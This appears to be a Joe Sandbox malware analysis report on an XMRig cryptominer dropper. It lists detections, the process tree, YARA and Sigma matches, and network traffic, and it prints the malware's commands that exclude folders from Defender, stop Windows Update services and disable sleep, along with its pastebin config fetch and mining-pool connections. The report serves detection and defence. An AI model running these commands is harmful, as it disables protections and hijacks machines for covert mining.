Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hiwA7Blv7C.exe

Overview

General Information

Sample name:hiwA7Blv7C.exe
renamed because original name is a hash value
Original sample name:882b403dcc4c6928de9d4a86bf4fbb650909485e828cba37258d68be81340739.exe
Analysis ID:1583518
MD5:7bf019893eb8df6fc169e8f9ef5269c6
SHA1:41fcc57f71768d9df534632d3d7c52138d59e3e1
SHA256:882b403dcc4c6928de9d4a86bf4fbb650909485e828cba37258d68be81340739
Tags:exeuser-JaffaCakes118
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
DNS related to crypt mining pools
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • hiwA7Blv7C.exe (PID: 1908 cmdline: "C:\Users\user\Desktop\hiwA7Blv7C.exe" MD5: 7BF019893EB8DF6FC169E8F9EF5269C6)
    • dialer.exe (PID: 2120 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • powershell.exe (PID: 2536 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3940 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6484 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 2616 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 3960 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 4256 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 5360 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 3520 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6532 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 5340 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 6920 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 6840 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • updater.exe (PID: 6556 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: 7BF019893EB8DF6FC169E8F9EF5269C6)
    • dialer.exe (PID: 6064 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 60 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 980 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1140 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 1060 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 5536 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • powershell.exe (PID: 3512 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1352 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5268 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 4176 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 3796 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 4136 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7164 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 1444 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2192 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 3552 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 2812 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 2084 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Windows\Temp\bzqlyietdwsj.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\Windows\Temp\bzqlyietdwsj.tmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x4e4b68:$a1: mining.set_target
      • 0x4e03c8:$a2: XMRIG_HOSTNAME
      • 0x4e1ed0:$a3: Usage: xmrig [OPTIONS]
      • 0x4e03a0:$a4: XMRIG_VERSION
      C:\Windows\Temp\bzqlyietdwsj.tmpMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
      • 0x4eac21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
      C:\Windows\Temp\bzqlyietdwsj.tmpMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
      • 0x4eb1e0:$s1: %s/%s (Windows NT %lu.%lu
      • 0x4eba40:$s3: \\.\WinRing0_
      • 0x4e4178:$s4: pool_wallet
      • 0x4446e0:$s5: cryptonight
      • 0x4446f0:$s5: cryptonight
      • 0x444700:$s5: cryptonight
      • 0x444710:$s5: cryptonight
      • 0x444728:$s5: cryptonight
      • 0x444738:$s5: cryptonight
      • 0x444748:$s5: cryptonight
      • 0x444760:$s5: cryptonight
      • 0x444770:$s5: cryptonight
      • 0x444788:$s5: cryptonight
      • 0x4447a0:$s5: cryptonight
      • 0x4447b0:$s5: cryptonight
      • 0x4447c0:$s5: cryptonight
      • 0x4447d0:$s5: cryptonight
      • 0x4447e8:$s5: cryptonight
      • 0x444800:$s5: cryptonight
      • 0x444810:$s5: cryptonight
      • 0x444820:$s5: cryptonight
      SourceRuleDescriptionAuthorStrings
      00000034.00000003.2193166407.000001888CD4B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000034.00000002.3320602236.000001888CCB1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 9 entries
                SourceRuleDescriptionAuthorStrings
                47.2.dialer.exe.246fae5cc20.0.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  47.2.dialer.exe.246fae5cc20.0.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                  • 0x4f3188:$a1: mining.set_target
                  • 0x4ee9e8:$a2: XMRIG_HOSTNAME
                  • 0x4f04f0:$a3: Usage: xmrig [OPTIONS]
                  • 0x4ee9c0:$a4: XMRIG_VERSION
                  47.2.dialer.exe.246fae5cc20.0.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                  • 0x4f9241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                  47.2.dialer.exe.246fae5cc20.0.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                  • 0x4f9800:$s1: %s/%s (Windows NT %lu.%lu
                  • 0x4fa060:$s3: \\.\WinRing0_
                  • 0x4f2798:$s4: pool_wallet
                  • 0x452d00:$s5: cryptonight
                  • 0x452d10:$s5: cryptonight
                  • 0x452d20:$s5: cryptonight
                  • 0x452d30:$s5: cryptonight
                  • 0x452d48:$s5: cryptonight
                  • 0x452d58:$s5: cryptonight
                  • 0x452d68:$s5: cryptonight
                  • 0x452d80:$s5: cryptonight
                  • 0x452d90:$s5: cryptonight
                  • 0x452da8:$s5: cryptonight
                  • 0x452dc0:$s5: cryptonight
                  • 0x452dd0:$s5: cryptonight
                  • 0x452de0:$s5: cryptonight
                  • 0x452df0:$s5: cryptonight
                  • 0x452e08:$s5: cryptonight
                  • 0x452e20:$s5: cryptonight
                  • 0x452e30:$s5: cryptonight
                  • 0x452e40:$s5: cryptonight
                  47.2.dialer.exe.246fae38c60.2.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    Click to see the 7 entries

                    Operating System Destruction

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 3940, ProcessName: cmd.exe

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 2536, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 2536, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 2120, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 2536, ProcessName: powershell.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-02T23:26:04.974237+010020542471A Network Trojan was detected172.67.19.24443192.168.2.649701TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: hiwA7Blv7C.exeAvira: detected
                    Source: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmpAvira: detection malicious, Label: RKIT/Agent.dvyic
                    Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: TR/Rozena.qmghx
                    Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmpReversingLabs: Detection: 86%
                    Source: C:\Windows\Temp\bzqlyietdwsj.tmpReversingLabs: Detection: 62%
                    Source: hiwA7Blv7C.exeReversingLabs: Detection: 60%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmpJoe Sandbox ML: detected
                    Source: C:\Windows\Temp\bzqlyietdwsj.tmpJoe Sandbox ML: detected
                    Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                    Source: hiwA7Blv7C.exeJoe Sandbox ML: detected

                    Bitcoin Miner

                    barindex
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000034.00000003.2193166407.000001888CD4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000034.00000002.3320602236.000001888CCB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000034.00000003.2193071885.000001888D285000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000034.00000003.2193071885.000001888D28F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000034.00000002.3320602236.000001888CD31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dialer.exe PID: 1060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: dialer.exe PID: 5536, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPED
                    Source: unknownDNS query: name: xmr-eu1.nanopool.org
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                    Source: hiwA7Blv7C.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165EDCE0 FindFirstFileExW,23_2_000002D0165EDCE0
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F151DCE0 FindFirstFileExW,27_2_000002D6F151DCE0
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F157DCE0 FindFirstFileExW,27_2_000002D6F157DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FDDCE0 FindFirstFileExW,30_2_0000014E41FDDCE0
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B08DCE0 FindFirstFileExW,31_2_000001D15B08DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023AF32EDCE0 FindFirstFileExW,46_2_0000023AF32EDCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FD9DCE0 FindFirstFileExW,50_2_0000023C9FD9DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA71DCE0 FindFirstFileExW,51_2_000001A1CA71DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246EDE6DCE0 FindFirstFileExW,53_2_00000246EDE6DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 54_2_00000200A19BDCE0 FindFirstFileExW,54_2_00000200A19BDCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 55_2_000002259668DCE0 FindFirstFileExW,55_2_000002259668DCE0

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 172.67.19.24:443 -> 192.168.2.6:49701
                    Source: unknownDNS query: name: pastebin.com
                    Source: global trafficTCP traffic: 192.168.2.6:49700 -> 54.37.137.114:10343
                    Source: global trafficTCP traffic: 192.168.2.6:49703 -> 51.15.58.224:10343
                    Source: Joe Sandbox ViewIP Address: 51.15.58.224 51.15.58.224
                    Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                    Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                    Source: Joe Sandbox ViewIP Address: 54.37.137.114 54.37.137.114
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /raw/mJdpKdhr HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6
                    Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: lsass.exe, 0000001B.00000003.2647035965.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3327715364.000002D6F0C47000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136107573.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2179014845.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136260768.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329583490.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: lsass.exe, 0000001B.00000003.2656931212.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329017237.000002D6F0CE9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                    Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                    Source: lsass.exe, 0000001B.00000002.3330772432.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2647178461.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
